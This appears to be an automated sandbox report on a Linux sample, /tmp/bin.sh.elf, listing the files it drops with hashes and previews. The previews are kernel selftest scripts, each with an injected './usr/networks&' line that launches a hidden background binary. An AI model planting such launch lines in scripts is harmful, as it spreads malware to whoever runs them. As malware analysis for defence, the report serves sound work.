                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):440
                                                                        Entropy (8bit):4.763089121502071
                                                                        Encrypted:false
                                                                        SSDEEP:6:w6vCiRoM3084xva2SjUxTBxusvt+b2Fq4xTBxexvus1exTBxw8vXWRJxw8vqRyPf:w6vCi9308p26DLdeZW/amIHWfK4n
                                                                        MD5:5BD12FE7C8C716573A9C2440489F66D5
                                                                        SHA1:0E0DBAB9D91E1477B4DD25C9DF8CA21CC1ED685E
                                                                        SHA-256:1D395E276AF9F8C40ED69F34CABDDEF7A84DA9A61044A8A686C1AA1E552F4EBB
                                                                        SHA-512:BBD5B97062BB22CF0F22DBC204DED6F02220226BBBCA45E6AE1498C14B6C40E4DFDF9145B21E46FDD47F04EB7A0125215FDA26DAAAF24E642D5BD317365D0D02
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if grep -q "error:" < $F.then..print_bug $title build errors:..grep "error:" < $F..exit 2.fi..grep warning: < $F > $T/warnings.grep "include/linux/*rcu*\.h:" $T/warnings > $T/hwarnings.grep "kernel/rcu/[^/]*:" $T/warnings > $T/cwarnings.cat $T/hwarnings $T/cwarnings > $T/rcuwarnings.if test -s $T/rcuwarnings.then..print_warning $title build errors:..cat $T/rcuwarnings..exit 2.fi.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:awk or perl script, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3346
                                                                        Entropy (8bit):5.221477851845867
                                                                        Encrypted:false
                                                                        SSDEEP:96:KV10en3z5OT8O/tW5BHo8vHMHeHbzsHCHzxLXH:KrD5W3/Y59o8PA+/g6lLXH
                                                                        MD5:B0BFAAC54A7134DCFF782734D469AFB4
                                                                        SHA1:D9901011FD87AF6CE19A8DE2A8EF7A3B0E64F47E
                                                                        SHA-256:035123E62082D161C1073A280DED4376FE8896FB8579AD87A9735470BC0426E0
                                                                        SHA-512:6C584E4245ADD2C9F1AB92A8C540D8C69B02237F1CB7B04397ACBE0538897C2588269CA50105553985EC0B2E2850BDC315D6AC9DDFC5087A78A9D833D9A5BE19
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi.if grep -Pq '\x00' < $file.then..print_warning Console output contains nul bytes, old qemu still running?.fi.cat /dev/null > $file.diags..# Check for proper termination, except that rcuperf runs don't indicate this..if test "$TORTURE_SUITE" != rcuperf.then..# check for abject failure...if grep -q FAILURE $file || grep -q -e '-torture.*!!!' $file..then...nerrs=`grep --binary-files=text '!!!' $file |...tail -1 |...awk '...{....for (i=NF-8;i<=NF;i++).....sum+=$i;...}...END { print sum }'`...print_bug $title FAILURE, $nerrs instances...exit..fi...grep --binary-files=text 'torture:.*ver:' $file |..egrep --binary-files=text -v '\(null\)|rtc: 000000000* ' |..sed -e 's/^(initramfs)[^]]*] //' -e 's/^\[[^]]*] //' |..awk '..BEGIN.{...ver = 0;...badseq = 0;...}....{...if (!badseq && ($5 + 0 != $5 || $5 <= ver)) {....badseqno1 = ver;....badseqno2 = $5;....badseqnr = NR;....badseq = 1;...}...ver = $5...}...END.{...if (badseq) {....if (badseqno1 == badseqno2 && badseqno2 ==
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1723
                                                                        Entropy (8bit):5.244148997020697
                                                                        Encrypted:false
                                                                        SSDEEP:48:HUYh+e1GOsVHdX9wVzPfkCx9BF/5EneTtiLcZqMqxzcoaBFF:HUYOO+wzjnBvEnutec4DFaBFF
                                                                        MD5:4469B917A8A4B3B4430DF7D1A1BA0167
                                                                        SHA1:66D0537A41CE66007719B735969E97511BC53AB2
                                                                        SHA-256:1196A906EA766E04AF8FCA2C4066AF2BF3747997E3A0B78D68F727ECDBC72374
                                                                        SHA-512:58CBAA85AB371CE0D6A09D55047ACBA96D4708A8AA9F9662927666C8154BD67B45E4938CEF6CFE4763C971D581CA8D0CE7089DA7C6D13D07E2CA228FDC9DDEF1
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 99.fi..if test "x$1" = "x--should-pass"; then..should_pass="yes".elif test "x$1" = "x--should-fail"; then..should_pass="no".else..echo "Unrecognized argument '$1'" 1>&2...# Exit code 99 indicates a hard error...exit 99.fi..CBMC=${CBMC:-cbmc}..SYNC_SRCU_MODE=${SYNC_SRCU_MODE:-simple}..case ${SYNC_SRCU_MODE} in.kernel) sync_srcu_mode_flags="" ;;.simple) sync_srcu_mode_flags="-DUSE_SIMPLE_SYNC_SRCU" ;;..*)..echo "Unrecognized argument '${SYNC_SRCU_MODE}'" 1>&2..exit 99..;;.esac..min_cpus_fail=1..c_file=`dirname "$2"`/test.c..# Source the input file... $2..if test ${min_cpus_fail} -gt 2; then..default_default_cpus=${min_cpus_fail}.else..default_default_cpus=2.fi.default_cpus=${default_cpus:-${default_default_cpus}}.cpus=${NR_CPUS:-${default_cpus}}..# Check if there are two few cpus to make the test fail..if test $cpus -lt ${min_cpus_fail:-0}; then..should_pass="yes".fi..cbmc_opts="-DNR_CPUS=${cpus} ${sync_srcu_mode_flags} ${test_cbmc_options} ${CBMC_FLAGS}"..echo "Run
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1441
                                                                        Entropy (8bit):5.520351213592847
                                                                        Encrypted:false
                                                                        SSDEEP:24:xVyGO/8VUp+ccmLeeUQux6yNScMR5oHK80E8ZmPzgawreotgf4:90344yAfR6q8T6
                                                                        MD5:6D0439EE0A83FA091605410727383ED1
                                                                        SHA1:4ED9E279DCE80C03CD141460955D2284D051C686
                                                                        SHA-256:DFD67005F4B0D998D6520DDE9A33CF5C678E5442D4F825A8F5FC55EF45CC8F4E
                                                                        SHA-512:49C286E596728138394AA3E24DBEE748AF53AF29FD6FCACB2031499FEE141DCE590CB0FF8282A3E273E88234933E0EC7379209E2581207BC171D1F073E7BB4B1
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..../param_test ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...echo "Running compare-twice test ${TEST_NAME[$i]}"..../param_test_compare_twice ${TEST_LIST[$i]} -r ${REPS} -t ${NR_THREADS} ${@} ${EXTRA_ARGS} || exit 1...let "i++"..done.}..echo "Default parameters".do_tests..echo "Loop injection: 10000 loops"..OLDIFS="$IFS".IFS=$'\n'.INJECT_LIST=(.."1".."2".."3".."4".."5".."6".."7".."8".."9".).IFS="$OLDIFS"..NR_LOOPS=10000..i=0.while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do..echo "Injecting at <${INJECT_LIST[$i]}>"..do_tests -${INJECT_LIST[i]} ${NR_LOOPS}..let "i++".done.NR_LOOPS=..function inject_blocking().{..OLDIFS="$IFS"..IFS=$'\n'..INJECT_LIST=(..."7"..."8"..."9"..)..IFS="$OLDIFS"...NR_LOOPS=-1...i=0..while [ "$i" -lt "${#INJECT_LIST[@]}" ]; do...echo "Injecting at <${INJECT_LIST[$i]}>"...do_tests -${INJECT_LIST[i]} -1 ${@}...let "i++"..done..NR_LOOPS=.}..echo "Yield injection (25%)".inject_blocking -m 4 -y..echo "Yield injection (50%)".injec
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):164
                                                                        Entropy (8bit):4.703374469471104
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVPnKWoW6MKRDRFJFFGSsW1BszoQEDRnAasxms1C7H/Q8OORgn:cnKWc1RyS7s+RoC7f4n
                                                                        MD5:4FFDFD98A8EC4B24C420EA596E877E98
                                                                        SHA1:A347AF4262380086119C8B266DDCB413C305DD56
                                                                        SHA-256:02EE38B1E0AA00683029AFCF243C511E42C87B15587BB391CBD85500E40FD3A6
                                                                        SHA-512:31A0B1729DB13FA350392FABE7D577FA9C7BD28059AFC86EF5F5AC772A78350D7A914505DD3D7EA2F0125DEE8CF734C7CFFCFCA5C976C7AE132475D4CDB7E50A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi.}..main_function().{. check_root. ./safesetid-test.}..main_function.echo "$TCID: done".exit $errcode../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):48
                                                                        Entropy (8bit):3.9783080115802454
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORTplOORgn:WMn
                                                                        MD5:50E7468E4E97AE4ECF676B96998FC995
                                                                        SHA1:538F6C756DC4F74B178728E62AE16C1EA1B72FA5
                                                                        SHA-256:B2D1993B3FFB264F55539AEFD10D6D9D27790CE632494F615EEEF6C420F941D8
                                                                        SHA-512:F04E7E06B151CE2EEA6461169C8B20493FA562028C716D6B404921CB44D68E145EAA0BA96E248C4F2DFE086D7EEF7222E1424DD11C390507FF1D3B478B6549AB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $rc../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):121
                                                                        Entropy (8bit):4.548077184392065
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVfFmf2MRvvvjNuQfoM8z/XFHXqFOnAzlv4MyoOORgn:Kgf2MZxuQe1XqZZwMyTn
                                                                        MD5:D0716F8976E5A2BD3006022236D35997
                                                                        SHA1:B93A17EAFF6DCA4E8AFC7B7B6499243747674867
                                                                        SHA-256:BE73D64821BFCD4820F3534D766504F2560429CB3BBEDC1730D3DA9F707D128D
                                                                        SHA-512:2526432AAEFDE2BDC74F70114E599C4AB5882EB38B3EADDD28FC2CE177DE29DABCF310AAF53814641B3F173E78CFC475C8988402009DBE7F965E9CAC2C3D4D9B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.test "$n" = 0 && exit 0..echo "default_file_splice_read broken: leaked $n".exit 1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):521
                                                                        Entropy (8bit):4.767031693352474
                                                                        Encrypted:false
                                                                        SSDEEP:12:9HbxmceznOmPqkAVHKVHwvN0B9VHwvHNW6v7n:JbQZ5bAVqVM0B9V0Nl7
                                                                        MD5:5CDE33DAE3EA85DA6E63293AC24BE38C
                                                                        SHA1:3F0558198FBC9C65482C46F0AEA513EA2D89FCAC
                                                                        SHA-256:4F030F9DD632BDE1ED2B9F8E9834D2FB35B16493C7209B773EAD8F5E03BC0D95
                                                                        SHA-512:C57CD9F086ADF85DE11F6A208D532A85ACAA3A659B1491E3DDB14A4D7C873DE240306A1DDAB4BEFC54D9C79FEE328A264022733D8EF078FB18956DB3FC0077A4
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n test_static_keys; then..echo "static_key: module test_static_keys is not found [SKIP]"..exit $ksft_skip.fi..if /sbin/modprobe -q test_static_key_base; then..if /sbin/modprobe -q test_static_keys; then...echo "static_key: ok".../sbin/modprobe -q -r test_static_keys.../sbin/modprobe -q -r test_static_key_base..else...echo "static_keys: [FAIL]".../sbin/modprobe -q -r test_static_key_base..fi.else..echo "static_key: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):202
                                                                        Entropy (8bit):4.77491154916863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVasWoWb+K3rKCAWR+GzerNu5GrKbVR9+GzYNYmxf74Dmxf/FP4y6viXVOORgn:6WloxSnVH+dY8S89Pd6viMn
                                                                        MD5:075C3AC55C2EAF1DF12AA1A2031687C0
                                                                        SHA1:E6A3D2FF970B119ECDC462CEA01AE7D55CEBE7A9
                                                                        SHA-256:82F404B2CA157B49A13AE50D01741F29E6F4C245CCD7F9370F7B8ABA33828682
                                                                        SHA-512:66E6CA1024FBC0D3609BAA2EFA6CC0F746766F00EC991FF204AEF9A77081567C2A73BE7EFC7F137F68D1C8046E0E0A5D30786A725C3088239298820235CE3915
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi.if /sbin/modprobe -q test_user_copy; then../sbin/modprobe -q -r test_user_copy..echo "user_copy: ok".else..echo "user_copy: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3804
                                                                        Entropy (8bit):5.189907595788207
                                                                        Encrypted:false
                                                                        SSDEEP:48:7Ca0YloYO7EULo1Ej5HBWnRr3kazJzmJC0+aRciuTDDSp+QWjMdZ+DXZpan7pr:7t4y48KaoJIzDSplDODja7pr
                                                                        MD5:BE3B50DCF88D2B312C64899D8306EB3E
                                                                        SHA1:987091A88752E8554ADC6EA2564A86E72A9282CF
                                                                        SHA-256:922A1DDF276FE35630EB32D7FA1D601277FEC29C6868518BA084A1FD05688E82
                                                                        SHA-512:640533EC07A7070906C1D2E7686A2F7E23E9B394D9A8A1A205A5B1ABC1AFA20D6340824FD7725687376FEF980F171E76E4D026F6614261F6B932587ECE210176
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exitcode=1..# Kselftest framework requirement - SKIP code is 4..ksft_skip=4..#.# Static templates for performance, stressing and smoke tests..# Also it is possible to pass any supported parameters manualy..#.PERF_PARAM="single_cpu_test=1 sequential_test_order=1 test_repeat_count=3".SMOKE_PARAM="single_cpu_test=1 test_loop_count=10000 test_repeat_count=10".STRESS_PARAM="test_repeat_count=20"..check_test_requirements().{..uid=$(id -u)..if [ $uid -ne 0 ]; then...echo "$0: Must be run as root"...exit $ksft_skip..fi...if ! which modprobe > /dev/null 2>&1; then...echo "$0: You need modprobe installed"...exit $ksft_skip..fi...if ! modinfo $DRIVER > /dev/null 2>&1; then...echo "$0: You must have the following enabled in your kernel:"...echo "CONFIG_TEST_VMALLOC=m"...exit $ksft_skip..fi.}..run_perfformance_check().{..echo "Run performance tests to evaluate how fast vmalloc allocation is."..echo "It runs all test cases on one single CPU with sequential order."...modprobe $DRIVER
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):59
                                                                        Entropy (8bit):4.140763389477654
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                                        MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                                        SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                                        SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                                        SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4118
                                                                        Entropy (8bit):5.170223934018025
                                                                        Encrypted:false
                                                                        SSDEEP:48:M5oJmTjrAeHf8ylJL+sh6EZrbMAQ25JN7i8DmLBsxCkxCX09doiqKdCF7C9Y:6/AeHfzDysp4oGVe9lo
                                                                        MD5:BEFDF35EDFCAFA649407CD9A390F725B
                                                                        SHA1:64FCBBEFD1DB4496C1A69EBF6A27918FA8989543
                                                                        SHA-256:D9786D0B311044F9D317FACECE2CEA5A4A28B4E89EABA344F55ABD9142D14A94
                                                                        SHA-512:08AFF2F22DCDE9B948841CCC6B9544A041E602F3B6D01C0D2E9E3D9920FB81AB015C557928FF53CD4A1E9E9D729C7F62D1E8FF5BE057593FBFC322F7408D5CE9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi.}..zram_cleanup().{..echo "zram cleanup"..local i=..for i in $(seq 0 $dev_makeswap); do...swapoff /dev/zram$i..done...for i in $(seq 0 $dev_mounted); do...umount /dev/zram$i..done...for i in $(seq 0 $(($dev_num - 1))); do...echo 1 > /sys/block/zram${i}/reset...rm -rf zram$i..done..}..zram_unload().{..if [ $MODULE -ne 0 ] ; then...echo "zram rmmod zram"...rmmod zram > /dev/null 2>&1..fi.}..zram_load().{..# check zram module exists..MODULE_PATH=/lib/modules/`uname -r`/kernel/drivers/block/zram/zram.ko..if [ -f $MODULE_PATH ]; then...MODULE=1...echo "create '$dev_num' zram device(s)"...modprobe zram num_devices=$dev_num...if [ $? -ne 0 ]; then....echo "failed to insert zram module"....exit 1...fi....dev_num_created=$(ls /dev/zram* | wc -w)....if [ "$dev_num_created" -ne "$dev_num" ]; then....echo "unexpected num of devices: $dev_num_created"....ERR_CODE=-1...else....echo "zram load module successful"...fi..elif [ -b /dev/zram0 ]; then...echo "/dev/zra
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):53
                                                                        Entropy (8bit):4.011057842116201
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORT0DAvSQ8OORgn:bDA64n
                                                                        MD5:9AD83E837CC1DEF0B2E4172E1D4A59DA
                                                                        SHA1:A9D8A337A3BC32D9BC15A5FD8A8B5932F33B3B82
                                                                        SHA-256:34BB767768F1C4420BF0B7A20F1EBF372F2A428B9096D633E41931768A409C76
                                                                        SHA-512:6185BCB8BF8D6F340516719576C79D6C0854589CBABDCB213AFF58C18EF4F43B00E811364782554DA418E732AA1918C7F361E6FD99AE5FFBDB7471AB328F05DD
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $retcode../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5016
                                                                        Entropy (8bit):4.970509239077376
                                                                        Encrypted:false
                                                                        SSDEEP:96:cYLZoIK9jKurJp8F6Wx0MpwWG77dkHFMK:cAZor7JM6lM+h7dot
                                                                        MD5:8878C23009543D7C0A3502AAC9BB947B
                                                                        SHA1:228AB7C7586B65B59B7C226D70AFE69FB83FC41B
                                                                        SHA-256:23569BBDA3A6391C7E40DC42AD2270960473BD136D19405A76717DD24CF99C42
                                                                        SHA-512:014DFBF6C8FA4CD797162842D90697F1ABCC568CA8C35B1C70480B568E116858DBA280DA74D23FD38FB9CA9627970D7EE3AD1D6C50B5952EEE598E0B39F566D6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1. fi.}..ARGS="$*"..if [ "$ARGS" = "" ];.then. ARGS="$TYPES".fi..# FIXME use /sys/bus/usb/device/$THIS/bConfigurationValue to.# check and change configs..CONFIG=''..check_config ().{. if [ "$CONFIG" = "" ]; then..CONFIG=$1..echo "assuming $CONFIG configuration"..return. fi. if [ "$CONFIG" = $1 ]; then..return. fi.. echo "** device must be in $1 config, but it's $CONFIG instead". exit 1.}...echo "TESTING: $ARGS"..while : true.do. echo $(date).. for TYPE in $ARGS. do..# restore defaults..COUNT=5000..BUFLEN=2048...# FIXME automatically multiply COUNT by 10 when..# /sys/bus/usb/device/$THIS/speed == "480"..#.COUNT=50000...case $TYPE in..control).. # any device, in any configuration, can use this... echo '** Control test cases:'... echo "test 9: ch9 postconfig".. do_test -t 9 -c 5000.. echo "test 10: control queueing".. do_test -t 10 -c 5000... # this relies on some vendor-specific commands.. echo "test 14: cont
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
